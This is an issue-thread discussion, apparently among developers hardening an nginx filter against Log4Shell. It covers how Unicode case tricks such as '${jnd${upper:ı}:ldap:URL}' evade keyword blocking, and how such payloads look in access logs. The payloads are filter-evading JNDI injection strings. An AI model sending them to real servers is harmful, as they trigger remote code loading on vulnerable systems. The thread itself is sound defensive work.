Catch UTF symbols

[igor-mendix]

Some UTF symbols can be converted by Java to normal ASCII (source).

Example:

${jnd${upper:ı}:ldap:URL}

Maybe we can block all requests that contain UTF symbols altogether as I can't imagine a situation when they are used in URIs or headers. But it seems too blunt, maybe there's a better way.

[Napsty]

Aren't they url-encoded by Nginx when they arrive at Nginx?

[igor-mendix]

In the nginx access logs they do become escaped:

"${${jnd${upper:\xC4\xB1}:ldap:localhost/log4shell_test}"

But does it mean they're neutralized?

[krogon]

There are more known attack vectors, like date or environment variables. As of now there is 13 different bypass techniques, all described at https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words